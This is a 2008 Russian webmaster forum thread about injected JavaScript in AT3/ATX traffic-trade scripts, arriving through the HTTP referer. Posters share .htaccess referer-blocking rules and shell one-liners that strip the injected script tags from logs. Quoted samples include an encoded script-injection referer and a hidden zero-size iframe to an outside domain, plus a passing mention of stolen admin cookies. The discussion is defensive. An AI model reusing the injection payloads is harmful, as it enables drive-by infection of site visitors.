Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Попытки залогинитьcя в АТЛ под user/pass
цитата
17/03/08 в 00:55
 Don Juan
тоже интересует вопрос
в плане уязвимости атл3 и атх отличия есть?
цитата
17/03/08 в 02:56
 Kitaa
нету разницы.
цитата
18/03/08 в 09:31
 brandox
Код:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]


А можно расшифровать этот htaccess ?
для чего конкретно нужна последняя строчка ? Если я правильно понял - то нужно прописать yahoo и другие поисковики ?
цитата
18/03/08 в 09:51
 dos622
если в рефе пришедшего посетителя содержеться: document.write\(unescape то такой юзер идет примяком на гуглю.
хацкеры подставляют в рефе данную строку чтоб трояна запихать.
цитата
18/03/08 в 10:29
 brandox

приятно =) a пихать это в корневую папку или в cgi-bin/at3 ?
цитата
18/03/08 в 10:39
 wMaster
в корень
цитата
18/03/08 в 11:16
 shahfil
Soft-Com писал:
неплохо работает такой вариант защиты:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC]


и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?
цитата
18/03/08 в 13:14
 Darkest
Ебать. Тоже понасовали.
Soft-Com: поискал этой строкой (for file in locate x2.cgi do path и тп) - нашел как у всех в at3/l/in/ и в at3/l/sys/. Не подскажешь что в твою эту строку дописать, чтоб он все что нашел - покилял?
цитата
18/03/08 в 14:10
 brandox
запустил софткомовскую комманду
насовали по самые помидоры в l/sys и l/in =(
а вот в самих html страницах на сайтах ничего нет (может пока)
как избавиться от заразы ? защиту я уже поставил через htaccessы
и теперь как я понимаю нужно менять пароли везде ? ну там мускл базы от st, от самого st, atx/ at3 и тд ?
цитата
18/03/08 в 15:05
 saaas
shahfil писал:
и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?

а с тех самых пор когда этот модреврайт начали пихать вот таким вот способом
Soft-Com писал:

.....
в админке в notrade траффике если есть заходы типа
http://alfaporn.com/?"%26gt;%26lt;script%26gt;document.write(unesca…6d%65%6...
.......
цитата
18/03/08 в 15:08
 Soft-Com
shahfil писал:
и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?


мистика, но факт - работает.
И судя по в сему именно с тех пор, как модреврайт стал парсить заголовки запросов, а именно с самого начала существования этого модуля.

учи матчасть
http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
цитата
18/03/08 в 15:55
 Soft-Com
лучше всего чистить так:

Код:
cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document.write.*unesca.*<\/script>//g'; done


таким образом почистятся логи и статсы АТ3/АТХ от js-инклюда.

подобной же командой можно почистить и контент домена.

P.S.
через АТ3/АТХ можно поломать любую связку скриптов - как я уже писал раньше, можно порутать машину через это решето ...
цитата
18/03/08 в 20:23
 Darkest
Мде. Печально все это.
2Админы СмартСЖ - может вы таки правда подумаете на тему скрипта за % траффа? Можете сделать какой-нить опрос типа кто будет этим пользоваться (с указанием имеющегося траффа), прикините ~ кол-во К в сутки котое вы сможете получать... icon_smile.gif
цитата
18/03/08 в 23:34
 kazantipman
разъясните плиз

если x2 login и admin.cgi закрыты хтакцессо
есть ли какая то опасность? т.е. даже если кто-то получает пасс от админки (через нотрэйд) как он попадет в админку если он ее не видит даже?
цитата
18/03/08 в 23:47
 Soft-Com


есть вероятность того, что выставив самому себе украденую (правильную) куку, можно непосредственным обращением к скриптам АТ3/АТХ менять параметры и т.д. и т.п. - никто веть не знает интерфейса всех скриптов ...
цитата
19/03/08 в 01:02
 awm_mark
kazantipman писал:
разъясните плиз

если x2 login и admin.cgi закрыты хтакцессо
есть ли какая то опасность? т.е. даже если кто-то получает пасс от админки (через нотрэйд) как он попадет в админку если он ее не видит даже?


есть, учи матчасть (линухи, подмена IP)
цитата
19/03/08 в 01:44
 CraZ
биля пиздец. даже в мой дохлый сидж запихнули и вообще наверно дедик придется проверять, вот же мазготни из-за ебучего ат3.......
цитата
19/03/08 в 03:15
 amhost.net
Soft-Com писал:
лучше всего чистить так:

Код:
cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document.write.*unesca.*<\/script>//g'; done


таким образом почистятся логи и статсы АТ3/АТХ от js-инклюда.


предлагаю несколько расширить круг поиска, ибо попался инклуд через document.scripts
плюс не всегда стОит полагаться на locate, имеет смысл вместо него использовать find

Код:
for file in `find /home/ -name x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document." $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document\..*<\/script>//g'; done


/home/ замените на свой каталог с доменами, если отличается
цитата
19/03/08 в 06:44
 Soft-Com
да важное замечание - но для меня такое не подойдёт, у некоторых моих кастомеров кука выставляется подобным образом для трейда (если парсить контент имеется в виду)...

так что во тут как раз АВМ-мам уже стоит самим решать ... нанимать им администратора или нет icon_smile.gif.

Последний раз редактировалось: Soft-Com (19/03/08 в 07:20), всего редактировалось 1 раз
цитата
19/03/08 в 07:15
 Screwdriver
Хорошо что так и не купил ATX, снес к чертям атл со всех сайтов, прочитав этот топик.
цитата
19/03/08 в 09:28
 coder-code
beto писал:
<iframe src="http://ebony-hardcore.net/streamrotator/z/static.php" width=2 height=2 style="display:none"></iframe>


это мой домен. к чему бы это?
цитата
19/03/08 в 09:28
 coder-code
так все таки? чего делать то у когло alfaporn в реферах??
цитата
19/03/08 в 09:30
 sexogen
slonic писал:
это мой домен. к чему бы это?


Оффтопик: тебя вычеслии, ты тот самы хакер icon_smile.gif
цитата
19/03/08 в 09:43
 Soft-Com
slonic писал:
так все таки? чего делать то у когло alfaporn в реферах??


заблокировать всё левое в хтаксесе а потом почистить логи и статсы.
цитата
19/03/08 в 09:51
 coder-code
Soft-Com писал:
заблокировать всё левое в хтаксесе а потом почистить логи и статсы.



а можно каким нить доступным языком где нить почитатать как и что делать пошагово?


сенкс тебе, добрый человек
Стр. « первая   <  2, 3, 4, 5, 6  >  последняя »


Эта страница в полной версии